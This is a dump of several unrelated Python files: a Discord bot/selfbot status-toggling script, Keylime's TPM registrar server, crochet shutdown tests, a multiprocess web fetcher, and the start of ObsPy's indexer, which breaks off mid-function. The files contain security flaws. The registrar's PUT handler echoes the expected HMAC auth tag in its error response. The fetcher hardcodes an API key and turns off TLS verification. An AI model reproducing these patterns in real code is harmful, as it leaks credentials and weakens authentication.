if not auto_status:
consoleLog(f'{Fore.CYAN}Auto status is on.', True)
auto_status = True
while auto_status:
await client.change_presence(status=discord.Status.online)
await asyncio.sleep(random() + 0.3) # Theres a rate limit for changing status every minute or 5 minutes i havent figure out the exact number but ill stay with this sleep commmand
await client.change_presence(status=discord.Status.offline)
await asyncio.sleep(random() + 0.3)
else:
consoleLog(f'{Fore.BLUE}Auto status is off.', True)
auto_status = False
@commands.check(checkPerm)
@client.command(name='off', aliases=['logout', 'logoff', 'shutdown', 'stop'])
async def off(ctx):
### Discord takes too long to realize if the bot is offline people might get confused about the not turning off the bot vs discord takes time to update
await changeStatus(None, 'offline')
await client.logout()
###### Closing handler ######
###### https://github.com/aio-libs/aiohttp/issues/4324
from functools import wraps
from asyncio.proactor_events import _ProactorBasePipeTransport
def silence_event_loop_closed(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except RuntimeError as e:
if str(e) != 'Event loop is closed':
raise
return wrapper
_ProactorBasePipeTransport.__del__ = silence_event_loop_closed(_ProactorBasePipeTransport.__del__)
# PrivilegedIntents fixed fail :')
# async def login():
# global client
# try:
# await client.start(settings['token'], bot=not is_selfbot)
# except discord.PrivilegedIntentsRequired:
# print('PrivilegedIntentsRequired: This field is required to request for a list of members in the discord server that the bot is connected to. Watch https://youtu.be/DXnEFoHwL1A?t=44 to see how to turn on the required field.')
# # exit()
# client._connection = client._get_state(
# intents=client.intents.default()
# ) # reset intents to default
# input('lol')
# await login()
# except Exception as e:
# print(e)
# finally:
# sys.stdout.write('Exiting... \n')
# asyncio.run(login()) # if login failed because of the privileged intents then ask if user wants to turn off the intents
try:
client.run(settings['token'], bot=not is_selfbot)
except discord.PrivilegedIntentsRequired:
print('PrivilegedIntentsRequired: This field is required to request for a list of members in the discord server that the bot is connected to. Watch https://youtu.be/DXnEFoHwL1A?t=44 to see how to turn on the required field.')
exit()
except Exception as e:
print(e)
finally:
sys.stdout.write('Exiting... \n')
|
registrar_common.py
|
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
'''
import base64
import ipaddress
import threading
import sys
import signal
import time
import http.server
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy.orm.exc import NoResultFound
from cryptography.hazmat.backends import default_backend
from cryptography.x509 import load_der_x509_certificate
import simplejson as json
from keylime.db.registrar_db import RegistrarMain
from keylime.db.keylime_db import DBEngineManager, SessionManager
from keylime import cloud_verifier_common
from keylime import config
from keylime import crypto
from keylime.tpm import tpm2_objects
from keylime import keylime_logging
from keylime.tpm.tpm_main import tpm
from keylime import api_version as keylime_api_version
logger = keylime_logging.init_logging('registrar')
try:
engine = DBEngineManager().make_engine('registrar')
except SQLAlchemyError as err:
logger.error('Error creating SQL engine: %s', err)
sys.exit(1)
class ProtectedHandler(BaseHTTPRequestHandler, SessionManager):
def do_HEAD(self):
"""HEAD not supported"""
config.echo_json_response(self, 405, "HEAD not supported")
def do_PATCH(self):
"""PATCH not supported"""
config.echo_json_response(self, 405, "PATCH not supported")
def do_GET(self):
"""This method handles the GET requests to retrieve status on agents from the Registrar Server.
Currently, only agents resources are available for GETing, i.e. /agents. All other GET uri's
will return errors. agents requests require a single agent_id parameter which identifies the
agent to be returned. If the agent_id is not found, a 404 response is returned.
"""
session = SessionManager().make_session(engine)
rest_params = config.get_restful_params(self.path)
if rest_params is None:
config.echo_json_response(
self, 405, "Not Implemented: Use /agents/ interface")
return
if not rest_params["api_version"]:
config.echo_json_response(self, 400, "API Version not supported")
return
if "agents" not in rest_params:
config.echo_json_response(self, 400, "uri not supported")
logger.warning('GET returning 400 response. uri not supported: %s', self.path)
return
agent_id = rest_params["agents"]
if agent_id is not None:
try:
agent = session.query(RegistrarMain).filter_by(
agent_id=agent_id).first()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
if agent is None:
config.echo_json_response(self, 404, "agent_id not found")
logger.warning('GET returning 404 response. agent_id %s not found.', agent_id)
return
if not agent.active:
config.echo_json_response(self, 404, "agent_id not yet active")
logger.warning('GET returning 404 response. agent_id %s not yet active.', agent_id)
return
response = {
'aik_tpm': agent.aik_tpm,
'ek_tpm': agent.ek_tpm,
'ekcert': agent.ekcert,
'ip': agent.ip,
'port': agent.port,
'regcount': agent.regcount,
}
if agent.virtual:
response['provider_keys'] = agent.provider_keys
config.echo_json_response(self, 200, "Success", response)
logger.info('GET returning 200 response for agent_id: %s', agent_id)
else:
# return the available registered uuids from the DB
json_response = session.query(RegistrarMain.agent_id).all()
return_response = [item[0] for item in json_response]
config.echo_json_response(self, 200, "Success", {
'uuids': return_response})
logger.info('GET returning 200 response for agent_id list')
return
def do_POST(self):
"""POST not supported"""
config.echo_json_response(
self, 405, "POST not supported via TLS interface")
def do_PUT(self):
"""PUT not supported"""
config.echo_json_response(
self, 405, "PUT not supported via TLS interface")
def do_DELETE(self):
"""This method handles the DELETE requests to remove agents from the Registrar Server.
Currently, only agents resources are available for DELETEing, i.e. /agents. All other DELETE uri's will return errors.
agents requests require a single agent_id parameter which identifies the agent to be deleted.
"""
session = SessionManager().make_session(engine)
rest_params = config.get_restful_params(self.path)
if rest_params is None:
config.echo_json_response(
self, 405, "Not Implemented: Use /agents/ interface")
return
if not rest_params["api_version"]:
config.echo_json_response(self, 400, "API Version not supported")
return
if "agents" not in rest_params:
config.echo_json_response(self, 400, "URI not supported")
logger.warning('DELETE agent returning 400 response. uri not supported: %s', self.path)
return
agent_id = rest_params["agents"]
if agent_id is not None:
if session.query(RegistrarMain).filter_by(agent_id=agent_id).delete():
# send response
try:
session.commit()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
config.echo_json_response(self, 200, "Success")
return
# send response
config.echo_json_response(self, 404)
return
config.echo_json_response(self, 404)
# pylint: disable=W0622
def log_message(self, format, *args):
return
class UnprotectedHandler(BaseHTTPRequestHandler, SessionManager):
def do_HEAD(self):
"""HEAD not supported"""
config.echo_json_response(self, 405, "HEAD not supported")
def do_PATCH(self):
"""PATCH not supported"""
config.echo_json_response(self, 405, "PATCH not supported")
def do_GET(self):
"""This method handles the GET requests to the unprotected side of the Registrar Server
Currently the only supported path is /versions which shows the supported API versions
"""
rest_params = config.get_restful_params(self.path)
if rest_params is None:
config.echo_json_response(
self, 405, "Not Implemented: Use /version/ interface")
return
if "version" not in rest_params:
config.echo_json_response(self, 400, "URI not supported")
logger.warning('GET agent returning 400 response. URI not supported: %s', self.path)
return
version_info = {
"current_version": keylime_api_version.current_version(),
"supported_versions": keylime_api_version.all_versions(),
}
config.echo_json_response(self, 200, "Success", version_info)
def do_POST(self):
"""This method handles the POST requests to add agents to the Registrar Server.
Currently, only agents resources are available for POSTing, i.e. /agents. All other POST uri's
will return errors. POST requests require an an agent_id identifying the agent to add, and json
block sent in the body with 2 entries: ek and aik.
"""
session = SessionManager().make_session(engine)
rest_params = config.get_restful_params(self.path)
if rest_params is None:
config.echo_json_response(
self, 405, "Not Implemented: Use /agents/ interface")
return
if not rest_params["api_version"]:
config.echo_json_response(self, 400, "API Version not supported")
return
if "agents" not in rest_params:
config.echo_json_response(self, 400, "uri not supported")
logger.warning('POST agent returning 400 response. uri not supported: %s', self.path)
return
agent_id = rest_params["agents"]
if agent_id is None:
config.echo_json_response(self, 400, "agent id not found in uri")
logger.warning('POST agent returning 400 response. agent id not found in uri %s', self.path)
return
try:
content_length = int(self.headers.get('Content-Length', 0))
if content_length == 0:
config.echo_json_response(
self, 400, "Expected non zero content length")
logger.warning('POST for %s returning 400 response. Expected non zero content length.', agent_id)
return
post_body = self.rfile.read(content_length)
json_body = json.loads(post_body)
ekcert = json_body['ekcert']
aik_tpm = json_body['aik_tpm']
initialize_tpm = tpm()
if ekcert is None or ekcert == 'emulator':
logger.warning('Agent %s did not submit an ekcert' % agent_id)
ek_tpm = json_body['ek_tpm']
else:
if 'ek_tpm' in json_body:
# This would mean the agent submitted both a non-None ekcert, *and*
# an ek_tpm... We can deal with it by just ignoring the ek_tpm they sent
logger.warning('Overriding ek_tpm for agent %s from ekcert' % agent_id)
# If there's an EKCert, we just overwrite their ek_tpm
# Note, we don't validate the EKCert here, other than the implicit
# "is it a valid x509 cert" check. So it's still untrusted.
# This will be validated by the tenant.
ek509 = load_der_x509_certificate(
base64.b64decode(ekcert),
backend=default_backend(),
)
ek_tpm = base64.b64encode(
tpm2_objects.ek_low_tpm2b_public_from_pubkey(
ek509.public_key(),
)
)
aik_attrs = tpm2_objects.get_tpm2b_public_object_attributes(
base64.b64decode(aik_tpm),
)
if aik_attrs != tpm2_objects.AK_EXPECTED_ATTRS:
config.echo_json_response(
self, 400, "Invalid AK attributes")
logger.warning(
"Agent %s submitted AIK with invalid attributes! %s (provided) != %s (expected)",
agent_id,
tpm2_objects.object_attributes_description(aik_attrs),
tpm2_objects.object_attributes_description(tpm2_objects.AK_EXPECTED_ATTRS),
)
return
# try to encrypt the AIK
(blob, key) = initialize_tpm.encryptAIK(
agent_id,
base64.b64decode(ek_tpm),
base64.b64decode(aik_tpm),
)
# special behavior if we've registered this uuid before
regcount = 1
try:
agent = session.query(RegistrarMain).filter_by(
agent_id=agent_id).first()
except NoResultFound:
agent = None
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
raise
if agent is not None:
# keep track of how many ek-ekcerts have registered on this uuid
regcount = agent.regcount
if agent.ek_tpm != ek_tpm or agent.ekcert != ekcert:
logger.warning('WARNING: Overwriting previous registration for this UUID with new ek-ekcert pair!')
regcount += 1
# force overwrite
logger.info('Overwriting previous registration for this UUID.')
try:
session.query(RegistrarMain).filter_by(
agent_id=agent_id).delete()
session.commit()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
raise
# Check for ip and port
contact_ip = json_body.get('ip', None)
contact_port = json_body.get('port', None)
# Validate ip and port
if contact_ip is not None:
try:
# Use parser from the standard library instead of implementing our own
ipaddress.ip_address(contact_ip)
except ValueError:
logger.warning(f"Contact ip for agent {agent_id} is not a valid ip got: {contact_ip}.")
contact_ip = None
if contact_port is not None:
try:
contact_port = int(contact_port)
if contact_port < 1 or contact_port > 65535:
logger.warning(f"Contact port for agent {agent_id} is not a number between 1 and got: {contact_port}.")
contact_port = None
except ValueError:
logger.warning(f"Contact port for agent {agent_id} is not a valid number got: {contact_port}.")
contact_port = None
# Add values to database
d = {}
d['agent_id'] = agent_id
d['ek_tpm'] = ek_tpm
d['aik_tpm'] = aik_tpm
d['ekcert'] = ekcert
d['ip'] = contact_ip
d['port'] = contact_port
d['virtual'] = int(ekcert == 'virtual')
d['active'] = int(False)
d['key'] = key
d['provider_keys'] = {}
d['regcount'] = regcount
try:
session.add(RegistrarMain(**d))
session.commit()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
raise
response = {
'blob': blob,
}
config.echo_json_response(self, 200, "Success", response)
logger.info('POST returning key blob for agent_id: %s', agent_id)
except Exception as e:
config.echo_json_response(self, 400, "Error: %s" % e)
logger.warning("POST for %s returning 400 response. Error: %s", agent_id, e)
logger.exception(e)
def do_PUT(self):
"""This method handles the PUT requests to add agents to the Registrar Server.
Currently, only agents resources are available for PUTing, i.e. /agents. All other PUT uri's
will return errors.
"""
session = SessionManager().make_session(engine)
rest_params = config.get_restful_params(self.path)
if rest_params is None:
config.echo_json_response(
self, 405, "Not Implemented: Use /agents/ interface")
return
if not rest_params["api_version"]:
config.echo_json_response(self, 400, "API Version not supported")
return
if "agents" not in rest_params:
config.echo_json_response(self, 400, "uri not supported")
logger.warning('PUT agent returning 400 response. uri not supported: %s', self.path)
return
agent_id = rest_params["agents"]
if agent_id is None:
config.echo_json_response(self, 400, "agent id not found in uri")
logger.warning('PUT agent returning 400 response. agent id not found in uri %s', self.path)
return
try:
content_length = int(self.headers.get('Content-Length', 0))
if content_length == 0:
config.echo_json_response(
self, 400, "Expected non zero content length")
logger.warning('PUT for %s returning 400 response. Expected non zero content length.', agent_id)
return
post_body = self.rfile.read(content_length)
json_body = json.loads(post_body)
auth_tag = json_body['auth_tag']
try:
agent = session.query(RegistrarMain).filter_by(
agent_id=agent_id).first()
except NoResultFound as e:
raise Exception(
"attempting to activate agent before requesting "
"registrar for %s" % agent_id) from e
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
raise
if config.STUB_TPM:
try:
session.query(RegistrarMain).filter(RegistrarMain.agent_id == agent_id).update(
{'active': True})
session.commit()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
raise
else:
# TODO(kaifeng) Special handling should be removed
if engine.dialect.name == "mysql":
agent.key = agent.key.encode('utf-8')
ex_mac = crypto.do_hmac(agent.key, agent_id)
if ex_mac == auth_tag:
try:
session.query(RegistrarMain).filter(RegistrarMain.agent_id == agent_id).update(
{'active': True})
session.commit()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
raise
else:
raise Exception(
f"Auth tag {auth_tag} does not match expected value {ex_mac}")
config.echo_json_response(self, 200, "Success")
logger.info('PUT activated: %s', agent_id)
except Exception as e:
config.echo_json_response(self, 400, "Error: %s" % e)
logger.warning("PUT for %s returning 400 response. Error: %s", agent_id, e)
logger.exception(e)
return
def do_DELETE(self):
"""DELETE not supported"""
config.echo_json_response(self, 405, "DELETE not supported")
# pylint: disable=W0622
def log_message(self, format, *args):
return
# consider using PooledProcessMixIn
# https://github.com/muayyad-alsadi/python-PooledProcessMixIn
class RegistrarServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def __init__(self, server_address, RequestHandlerClass):
"""Constructor overridden to provide ability to read file"""
http.server.HTTPServer.__init__(
self, server_address, RequestHandlerClass)
def shutdown(self):
http.server.HTTPServer.shutdown(self)
def do_shutdown(servers):
for server in servers:
server.shutdown()
def start(host, tlsport, port):
"""Main method of the Registrar Server. This method is encapsulated in a function for packaging to allow it to be
called as a function by an external program."""
threads = []
servers = []
serveraddr = (host, tlsport)
RegistrarMain.metadata.create_all(engine, checkfirst=True)
session = SessionManager().make_session(engine)
try:
count = session.query(RegistrarMain.agent_id).count()
except SQLAlchemyError as e:
logger.error('SQLAlchemy Error: %s', e)
if count > 0:
logger.info("Loaded %d public keys from database", count)
server = RegistrarServer(serveraddr, ProtectedHandler)
context = cloud_verifier_common.init_mtls(section='registrar',
generatedir='reg_ca')
if context is not None:
server.socket = context.wrap_socket(server.socket, server_side=True)
thread = threading.Thread(target=server.serve_forever)
threads.append(thread)
# start up the unprotected registrar server
serveraddr2 = (host, port)
server2 = RegistrarServer(serveraddr2, UnprotectedHandler)
thread2 = threading.Thread(target=server2.serve_forever)
threads.append(thread2)
servers.append(server)
servers.append(server2)
logger.info('Starting Cloud Registrar Server on ports %s and %s (TLS) use <Ctrl-C> to stop', port, tlsport)
keylime_api_version.log_api_versions(logger)
for thread in threads:
thread.start()
def signal_handler(signum, frame):
del signum, frame
do_shutdown(servers)
sys.exit(0)
# Catch these signals. Note that a SIGKILL cannot be caught, so
# killing this process with "kill -9" may result in improper shutdown
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
# keep the main thread active, so it can process the signals and gracefully shutdown
while True:
if not any([thread.is_alive() for thread in threads]):
# All threads have stopped
break
# Some threads are still going
time.sleep(1)
for thread in threads:
thread.join()
|
test_shutdown.py
|
"""
Tests for _shutdown.
"""
from __future__ import absolute_import
import sys
import subprocess
import time
from twisted.trial.unittest import TestCase
from crochet._shutdown import (
Watchdog, FunctionRegistry, _watchdog, register, _registry)
from ..tests import crochet_directory
class ShutdownTests(TestCase):
"""
Tests for shutdown registration.
"""
def test_shutdown(self):
"""
A function registered with _shutdown.register() is called when the
main thread exits.
"""
program = """\
import threading, sys
from crochet._shutdown import register, _watchdog
_watchdog.start()
end = False
def thread():
while not end:
pass
sys.stdout.write("byebye")
sys.stdout.flush()
def stop(x, y):
# Move this into separate test at some point.
assert x == 1
assert y == 2
global end
end = True
threading.Thread(target=thread).start()
register(stop, 1, y=2)
sys.exit()
"""
process = subprocess.Popen([sys.executable, "-c", program],
cwd=crochet_directory,
stdout=subprocess.PIPE)
result = process.stdout.read()
self.assertEqual(process.wait(), 0)
self.assertEqual(result, b"byebye")
def test_watchdog(self):
"""
The watchdog thread exits when the thread it is watching exits, and
calls its shutdown function.
"""
done = []
alive = True
class FakeThread:
def is_alive(self):
return alive
w = Watchdog(FakeThread(), lambda: done.append(True))
w.start()
time.sleep(0.2)
self.assertTrue(w.is_alive())
self.assertFalse(done)
alive = False
time.sleep(0.2)
self.assertTrue(done)
self.assertFalse(w.is_alive())
def test_api(self):
"""
The module exposes a shutdown thread that will call a global
registry's run(), and a register function tied to the global registry.
"""
self.assertIsInstance(_registry, FunctionRegistry)
self.assertEqual(register, _registry.register)
self.assertIsInstance(_watchdog, Watchdog)
self.assertEqual(_watchdog._shutdown_function, _registry.run)
class FunctionRegistryTests(TestCase):
"""
Tests for FunctionRegistry.
"""
def test_called(self):
"""
Functions registered with a FunctionRegistry are called in reverse
order by run().
"""
result = []
registry = FunctionRegistry()
registry.register(lambda: result.append(1))
registry.register(lambda x: result.append(x), 2)
registry.register(lambda y: result.append(y), y=3)
registry.run()
self.assertEqual(result, [3, 2, 1])
def test_log_errors(self):
"""
Registered functions that raise an error have the error logged, and
run() continues processing.
"""
result = []
registry = FunctionRegistry()
registry.register(lambda: result.append(2))
registry.register(lambda: 1 / 0)
registry.register(lambda: result.append(1))
registry.run()
self.assertEqual(result, [1, 2])
excs = self.flushLoggedErrors(ZeroDivisionError)
self.assertEqual(len(excs), 1)
|
multiproc_fetcher.py
|
import re
import os
import sys
import json
import time
import pickle
import random
import requests
import traceback
import url_normalize
from multiprocessing import Pool
from multiprocessing import Queue
from multiprocessing import Process
# Disable insecure warning
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
#from requests.adapters import TimeoutSauce
#class MyTimeout(TimeoutSauce):
# def __init__(self, *args, **kwargs):
# connect = kwargs.get('connect', 5)
# read = kwargs.get('read', connect)
# super(MyTimeout, self).__init__(connect=connect, read=read)
#
#requests.adapters.TimeoutSauce = MyTimeout
sys.path.append("utils")
sys.path.append("extraction")
sys.path.append("search_apis")
from page import Page
from cache import Cache
from website import Website
from urlutility import URLUtility
from bing_search import Bing_Search
from link_extractor import Link_Extractor
def init_cache(filename):
print "Loading ", filename
return Cache(filename)
class Fetcher:
def __init__(self, data_dir, data_file=None, caching=True):
"""
Args:
caching: if False, do not store the data.
In this case, fetch() might be called for the same urls more than one time.
So, url deduplication needs to be handled outside the class
"""
if caching:
print "caching is TRUE - Save the fetched pages"
else:
print "caching is False - Don't save the fetched pages"
self.link_extractor = Link_Extractor()
self.header = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36'}
if not os.path.exists(data_dir):
os.makedirs(data_dir)
self.max_html_size = 1000000 # discard exceptionally large files
self.proc_numb = 32 # number of processes
self.timeout = 5 # requests timeout
self.caching = caching
self.uniq_urls = set() # Avoid re-crawling the previous urls. This variable will keep track of failed urls, which are not stored in discovery class
"""
# Single process
self.caches = []
for i in xrange(self.proc_numb):
name = data_file if data_file else "fetch"
if i:
fetch_cache_file = data_dir + "/" + name + "." + str(i) + ".json"
else:
fetch_cache_file = data_dir + "/" + name + ".json" # make the file compatible with single process fetcher
print fetch_cache_file
self.caches.append(Cache(fetch_cache_file))
"""
cache_files = [] # File to store that data
for i in xrange(self.proc_numb):
name = data_file if data_file else "fetch"
if i:
fetch_cache_file = data_dir + "/" + name + "." + str(i) + ".json"
else:
fetch_cache_file = data_dir + "/" + name + ".json" # make the file compatible with single process fetcher
cache_files.append(fetch_cache_file)
pool = Pool(self.proc_numb)
self.caches = pool.map(init_cache, cache_files)
bing_api_key = '79be97cfb50b418caf9cd0bff0ece408' #[email protected]
self.bing_search = Bing_Search(bing_api_key, data_dir)
def _contains(self, url):
"""
Check the cache if it contains the url.
Returns:
return a dict object if url exists in the cache, else return None
"""
for cache in self.caches:
if cache.contains(url):
return cache.get(url)
return None
def fetch_sites(self, urls, max_pages=1, selection="random", online=True, allow_fetch_later=False):
"""
Fetch the sites.
Step 1: Fetch the home pages
Step 2: Select representative pages from the fetched sites
Step 3: Fetch the selected representative pages
Step 4: Merge the fetched results
Parameters:
-----------
urls: list of url. Each url represents a website
max_pages: maximum number of pages to be selected in each website
selection: method to select pages in a website
online (boolean): online or offline mode. In offline mode, read data from the cache.
Returns:
--------
list<website>: list of fetched websites
"""
"""
# Hack: used pre-fetched data
if online==False and selection=="search":
# Read from the cache and return results
print "hacking ..."
print max_pages
websites = {}
for url in urls:
tld = URLUtility.get_tld(url)
websites[tld] = Website(url)
for url in self.cache.keys():
tld = URLUtility.get_tld(url)
if tld in websites:
#if len(websites[tld].pages)<max_pages:
page = Page(url)
page.load_from_json(self.cache.get(url))
websites[tld].add_page(page)
websites = [w for w in websites.values() if not w.is_empty()]
print "Number of websites that found in cache: ", len(websites)
for w in websites:
print w.get_host(), len(w.pages)
return websites
"""
#THE BELOW CODE WORKS FOR MULTIPLE-PAGES CASE BUT NOT OPTIMIZED FOR ONE-PAGE CASE
# Step 1: Fetch the home pages
pages = self.fetch_pages(urls, online, allow_fetch_later)
max_pages -= 1 # exclude the home page
websites = {}
for p in pages:
tld = p.get_tld()
w = Website(p.get_url())
w.add_page(p)
websites[tld] = w
# Step 2: Select representative pages from the fetched sites
if max_pages:
print " Selecting insite pages for representation. Selection method: ", selection
insite_urls = []
if selection==None:
# Only fetch the homepage
return websites.values()
if selection=="random":
for page in pages:
insite_urls.extend(self._select_random(page, max_pages))
elif selection=="search":
for page in pages:
insite_urls.extend(self._select_by_search(page, max_pages))
else:
print "Wrong selection method"
print " Selected ", len(insite_urls), " urls from ", len(pages), " sites"
# Step 3: Fetch the selected representative pages
pages = self.fetch_pages(insite_urls, online, allow_fetch_later)
# Step 4: Merge the fetched results
for p in pages:
tld = p.get_tld()
if tld not in websites:
print " Error: host does not exist", tld, p.get_url()
else:
websites[tld].add_page(p)
total_pages = sum([len(websites[tld].pages) for tld in websites])
print total_pages, len(websites)
if websites:
print " Average number of pages per site: ", total_pages/float(len(websites))
return websites.values()
"""
# Keep one url for each website
uniq_hosts = set()
temp_urls = []
for url in urls:
host = URLUtility.get_host(url)
if host not in uniq_hosts:
uniq_hosts.add(host)
temp_urls.append(url)
print "Fetching ", url
urls = temp_urls
# Fetch
pages = self.fetch_pages(urls, online, allow_fetch_later)
# Construct website list from page list (one page per site)
websites = []
for p in pages:
w = Website(p.get_url())
w.add_page(p)
websites.append(w)
return websites
"""
def _select_random(self, page, max_pages):
"""
Select random insite outlinks
"""
insite_urls = list(set(self.link_extractor.extract_insite_links(page.get_url(), page.get_html())))
return insite_urls[:max_pages]
"""
random.seed(len(insite_urls)) # make the randomness reproducible
#if not insite_urls:
# print page.get_url(), len(page.get_html())
if len(insite_urls)<max_pages:
return insite_urls
selected_urls = set()
while len(selected_urls)<max_pages:
i = random.randint(0, len(insite_urls)-1)
selected_urls.add(insite_urls[i])
return list(selected_urls)
"""
random.seed(len(insite_urls)) # make the randomness reproducible
def _select_by_search(self, page, max_pages):
"""
Select pages inside a given website using site search
Args:
max_pages: maximum number of pages selected in the site
"""
"Selecing pages using bing search"
host = page.get_host()
keyword = "gun"
urls = self.bing_search.search_site(keyword, host)
ret = []
for url in urls:
if len(ret)<max_pages:
if url!=page.get_url():
ret.append(url)
"""
if host=="http://www.armslist.com/":
print urls
print ret
print max_pages
"""
return ret
def _load_from_cache(self, urls):
"""
left_urls = []
pages = []
for url in urls:
obj = self._contains(url)
if obj:
page = Page(url)
page.load_from_json(obj)
pages.append(page)
else:
left_urls.append(url)
return pages, left_urls
"""
urls = set(urls)
loaded_urls = set()
pages = []
for cache in self.caches:
for url in cache.keys():
if (url in urls) and (url not in loaded_urls):
page = Page(url)
loaded_urls.add(url)
page.load_from_json(cache.get(url))
if page.body: # skip the page whose text extraction was failed
pages.append(page)
left_urls = [url for url in urls if url not in loaded_urls]
return pages, left_urls
def fetch_pages(self, urls, online=True, allow_fetch_later=False):
"""
Fetch the urls that are not in cache
Parameters:
-----------
urls: list of url. Each url represents a website
Returns:
--------
list<website>: list of fetched websites
"""
# Remove urls that were crawled previously
print "Number of urls considering to fetch: ", len(urls)
if allow_fetch_later==False:
temp_urls = []
for url in urls:
if url not in self.uniq_urls:
self.uniq_urls.add(url)
temp_urls.append(url)
urls = temp_urls
print "Number of urls will be fetched: ", len(urls)
pages, urls = self._load_from_cache(urls)
print " ", len(pages), " urls loaded from the cache, ", len(urls), " urls left"
if online:
jobs = []
results = Queue()
for i in range(self.proc_numb):
p = Process(target = self.fetch_pages_helper, args = (urls, i, self.proc_numb, self.caches[i], results))
jobs.append(p)
for p in jobs:
p.start()
fetched_pages = [p for _ in jobs for p in results.get()] # Result must be collected before join()
for p in jobs:
p.join()
if urls:
print " Fetched ", len(fetched_pages), " urls"
pages.extend(fetched_pages)
return pages
def fetch_pages_helper(self, urls, start, step, cache, results):
"""
Helper function for parallel fetching
"""
max_size = 5000000
pages = []
for i in range(start, len(urls), step):
url = urls[i]
if (i+1)%500==0:
print "Fetched ", i, " urls"
page = Page(url)
try:
text = ''
size = 0
res = requests.get(url, headers=self.header, verify=False, timeout=5, stream=True)
#t = time.time()
for chunk in res.iter_content(10000):
#if (time.time() - t) > 5:
# break
# raise ValueError('timeout reached')
text += chunk
size += len(chunk)
if size > max_size:
print "Size exceeds ", size
raise ValueError('response too large')
if res.status_code == 200:
#page = Page(url)
if len(text)<self.max_html_size:
page.add_html(text)
else:
print "Failed to fetch ", url, res.status_code, start
except:
print "Failed to fetch ", url
continue
# Save to cache. Note that always save the fetched pages even if the requests were failed
# since we want to avoid re-fetch these pages in the future
if self.caching:
cache.add(url, page.get_json_obj())
else:
page.get_json_obj() # hack
if page.body and (len(page.get_text('body'))>100):
#if not page.is_empty():
pages.append(page)
results.put(pages)
def test():
fetcher = Fetcher("test/fetcher_test_data")
urls = URLUtility.load_urls("test/data/urls.txt")
sites = fetcher.fetch(urls)
for site in sites:
for page in site:
print page.get_text('body')[:100].replace("\n", "")
def _read_urls_from_json(url_file):
urls = set()
with open(url_file) as lines:
for line in lines:
try:
jsonobj = json.loads(line)
for url in jsonobj[1:]:
url = URLUtility.normalize(url)
urls.add(url)
except:
traceback.print_exc()
print "Number of urls read from json file: ", len(urls)
return list(urls)
def fetch():
url_file = sys.argv[1]
urls = _read_urls_from_json(url_file)
data_dir = sys.argv[2]
fetcher = Fetcher(data_dir)
fetcher.fetch_sites(urls, 3, selection=None, online=True)
if __name__=="__main__":
#test()
fetch()
|
indexer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
A command-line program that indexes seismogram files into a database.
:copyright:
The ObsPy Development Team ([email protected])
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
.. rubric:: Usage Examples
(1) Run indexer as daemon continuously crawling the given paths but index only
the last 24 hours (-r24) of a waveform archive::
#!/bin/bash
DB=postgresql://username:password@localhost:5432/database
DATA=/path/to/archive/2010,/path/to/archive/2011,/path/to/arclink
LOG=/path/to/indexer.log
./obspy-indexer -v -i0.0 -n1 -u$DB -d$DATA -r24 -l$LOG &
(2) Run only once and remove duplicates::
./obspy-indexer -v -i0.0 --run-once --check-duplicates -n1 -u$DB -d$DATA
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA @UnusedWildImport
from future.utils import native_str
import logging
import multiprocessing
import select
import sys
from argparse import ArgumentParser
if sys.version_info.major == 2:
import BaseHTTPServer as http_server
else:
import http.server as http_server
from sqlalchemy import create_engine
from sqlalchemy.orm.session import sessionmaker
from obspy import __version__
from obspy.db.db import Base
from obspy.db.indexer import WaveformFileCrawler, worker
from obspy.db.util import parse_mapping_data
class MyHandler(http_server.BaseHTTPRequestHandler):
def do_GET(self): # noqa
"""
Respond to a GET request.
"""
out = """<html>
<head>
<title>obspy-indexer status</title>
<meta http-equiv="refresh" content="10" />
<style type="text/css">
th { text-align: left; font-family:monospace; width: 150px;
vertical-align: top; padding: 3px; }
td { font-family:monospace; padding: 3px;}
pre { margin: 0; }
</style>
</head>
<body>
<h1>obspy-indexer</h1>
<h2>Options</h2>
"""
out += '<table>'
for key, value in sorted(self.server.options.__dict__.items()):
out += "<tr><th>%s</th><td>%s</td></tr>" % (key, value)
if self.server.mappings:
out += "<tr><th>mapping rules</th><td>%s</td></tr>" % \
(self.server.mappings)
out += '</table>'
out += '<h2>Status</h2>'
out += '<table>'
out += "<tr><th>current path</th><td>%s</td></tr>" % \
(self.server._current_path)
out += "<tr><th>patterns</th><td><pre>%s</pre></td></tr>" % \
('\n'.join(self.server.patterns))
out += "<tr><th>features</th><td><pre>%s</pre></td></tr>" % \
('\n'.join(self.server.features))
out += "<tr><th>file queue</th><td><pre>%s</pre></td></tr>" % \
('\n'.join(self.server._current_files))
out += '</table>'
out += "</body></html>"
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(out)
class WaveformIndexer(http_server.HTTPServer, WaveformFileCrawler):
"""
A waveform indexer server.
"""
def serve_forever(self, poll_interval=0.5):
self.running = True
while self.running:
r, _w, _e = select.select([self], [], [], poll_interval)
if r:
self._handle_request_noblock()
self.iterate()
def _run_indexer(options):
logging.info("Starting indexer %s:%s ..." % (options.host, options.port))
# initialize crawler
service = WaveformIndexer((options.host, options.port), MyHandler)
service.log = logging
try:
